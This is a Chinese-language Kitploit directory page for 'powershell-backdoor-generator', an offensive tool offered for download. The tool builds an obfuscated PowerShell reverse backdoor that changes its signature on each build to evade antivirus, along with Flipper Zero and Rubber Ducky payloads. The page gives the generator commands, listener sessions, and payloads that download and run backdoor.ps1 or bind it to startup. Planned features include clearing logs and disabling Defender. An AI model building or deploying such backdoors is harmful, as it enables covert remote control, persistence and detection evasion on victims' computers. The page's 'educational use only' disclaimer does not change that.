Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
powershell-backdoor-generator — 用PowerShell编写并通过Python混淆的反向后门。它为流行的黑客设备(如Flipper Zero和Hak5 USB Rubber Ducky)生成有效载荷,并在每次构建后更改其签名以帮助规避AV。 | Kitploit
工具/GitHubGitHub/drew-alleman/powershell-backdoor-generator
Payload生成Shellcode 生成
GitHubdrew-alleman/powershell-backdoor-generator

powershell-backdoor-generator

用PowerShell编写并通过Python混淆的反向后门。它为流行的黑客设备(如Flipper Zero和Hak5 USB Rubber Ducky)生成有效载荷,并在每次构建后更改其签名以帮助规避AV。

查看仓库

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享
413653年前Kitploit 审核通过

/******************************************************************************

  • 免责声明:
  • 本程序仅供教育用途使用。使用本程序即表示您理解其使用相关的潜在风险。
    • 未经适当授权,不得在任何系统或网络上使用本程序。禁止未经授权的使用。
    • 本程序创建者对因使用本程序造成的任何损害、法律后果或数据丢失不承担任何责任。
    • 您有责任确保在使用本程序时遵守所有适用法律和法规。
  • 请负责任且道德地使用本程序,尊重他人的隐私和安全。 *****************************************************************************/

powershell-backdoor

Guide
用PowerShell编写、Python混淆的反向后门工具,每次构建后生成新签名以规避检测。该工具能够为Flipper Zero和Hak5 USB Rubber Ducky等流行黑客设备创建载荷。使用本工具测试您的系统对高级攻击技术的防御能力。

root@kitploit:~
usage: listen.py [-h] [--ip-address IP_ADDRESS] [--port PORT] [--random] [--out OUT] [--verbose] [--delay DELAY] [--flipper FLIPPER] [--ducky]
                 [--server-port SERVER_PORT] [--payload PAYLOAD] [--list--payloads] [-k KEYBOARD] [-L] [-H]

Powershell Backdoor Generator

options:
  -h, --help            show this help message and exit
  --ip-address IP_ADDRESS, -i IP_ADDRESS
                        IP Address to bind the backdoor too (default: 192.168.X.XX)
  --port PORT, -p PORT  Port for the backdoor to connect over (default: 4444)
  --random, -r          Randomizes the outputed backdoor's file name
  --out OUT, -o OUT     Specify the backdoor filename (relative file names)
  --verbose, -v         Show verbose output
  --delay DELAY         Delay in milliseconds before Flipper Zero/Ducky-Script payload execution (default:100)
  --flipper FLIPPER     Payload file for flipper zero (includes EOL conversion) (relative file name)
  --ducky               Creates an inject.bin for the http server
  --server-port SERVER_PORT
                        Port to run the HTTP server on (--server) (default: 8080)
  --payload PAYLOAD     USB Rubber Ducky/Flipper Zero backdoor payload to execute
  --list--payloads      List all available payloads
  -k KEYBOARD, --keyboard KEYBOARD
                        Keyboard layout for Bad Usb/Flipper Zero (default: us)
  -A, --actually-listen
                        Just listen for any backdoor connections
  -H, --listen-and-host
                        Just listen for any backdoor connections and host the backdoor directory

快速链接

  • 预览
  • 功能
  • 标准后门
  • Flipper Zero后门
  • USB Rubber Ducky后门
  • 致谢
  • 待办事项
  • 5次混淆后的输出

预览

预览

功能

  • Hak5 Rubber Ducky载荷
  • Flipper Zero载荷
  • 从远程系统下载文件
  • 从URL播放wav文件
  • 获取目标计算机的公网IP地址
  • 列出本地用户
  • 查找感兴趣的文件
  • 收集目标系统操作系统的信息
  • 检索目标系统的BIOS信息
  • 检查是否安装了防病毒软件及其当前状态
  • 获取活动TCP客户端
  • 安装Chocolatey(Windows常用包管理器,https://chocolatey.org/)
  • 检查目标系统是否安装了常见的渗透测试软件。

标准后门

root@kitploit:~
C:\Users\DrewQ\Desktop\powershell-backdoor-main> python .\listen.py --verbose
[*] Encoding backdoor script
[*] Saved backdoor backdoor.ps1 sha1:32b9ca5c3cd088323da7aed161a788709d171b71
[*] Starting Backdoor Listener 192.168.0.223:4444 use CTRL+BREAK to stop

当前工作目录中将生成一个名为 backdoor.ps1 的文件。

后门执行

已在Windows 11、Windows 10和Kali Linux上测试。要以隐藏窗口并持久化方式运行,请参考此指南 这里

root@kitploit:~
powershell.exe -File backdoor.ps1 -ExecutionPolicy Unrestricted
root@kitploit:~
┌──(drew㉿kali)-[/home/drew/Documents]
└─PS> ./backdoor.ps1

Bad USB / USB Rubber Ducky攻击

使用这些攻击中的任何一种,您都将开启一个HTTP服务器来托管后门。后门被获取后,HTTP服务器将关闭。

载荷

  • Execute -- 执行后门
  • BindAndExecute -- 将后门放置在用户的临时目录中,绑定后门到启动项,然后执行(需要管理员权限)

Flipper Zero后门

以下命令将生成一个名为 powershell_backdoor.txt 的文件,当在Flipper上触发时,它会从您的计算机通过HTTP获取后门并执行。

root@kitploit:~
C:\Users\DrewQ\Desktop\powershell-backdoor-main> python .\listen.py --flipper powershell_backdoor --payload execute
[*] Started HTTP server hosting file: http://192.168.0.223:8989/backdoor.ps1
[*] Starting Backdoor Listener 192.168.0.223:4444 use CTRL+BREAK to stop

将您指定的文本文件(例如 powershell_backdoor.txt)放入您的Flipper Zero。当载荷执行时,它将下载并执行 backdoor.ps1。

USB Rubber Ducky后门

以下是关于如何为Hak5 USB Rubber Ducky生成 inject.bin 文件的教程。

root@kitploit:~
 C:\Users\DrewQ\Desktop\powershell-backdoor-main> python .\listen.py --ducky --payload BindAndExecute
[*] Started HTTP server hosting file: http://192.168.0.223:8989/backdoor.ps1
[*] Starting Backdoor Listener 192.168.0.223:4444 use CTRL+BREAK to stop

一个名为 inject.bin 的文件将被放置在您当前的工作目录中。此功能需要Java。当载荷执行时,它将下载并执行 backdoor.ps1。

致谢

为了将 payload.txt 编码为 inject.bin 以用于USB Rubber Ducky攻击,我使用了由 midnitesnake 创建的 encoder.jar。

待办事项

  • 拉取最近的RDP连接
  • 从URL更改壁纸
  • 查找可写目录
  • 清除日志
  • 禁用Defender

5次混淆后的输出

以下是5次构建后 backdoor.ps1 的sha1哈希值。

root@kitploit:~
1e158f02484e5c58d74c1507a1773392ffacfca2
6d18230a419195d0f77519abc0238768956cdd58
558a8cbac40239c9e6660a45cc8fc5d02b5057d7
caf4d0c8424eceb960d5f5c526e83ecd485c4ac9
947b57824917842d79f9cbcac8a795aa7c2f8a49
下载工具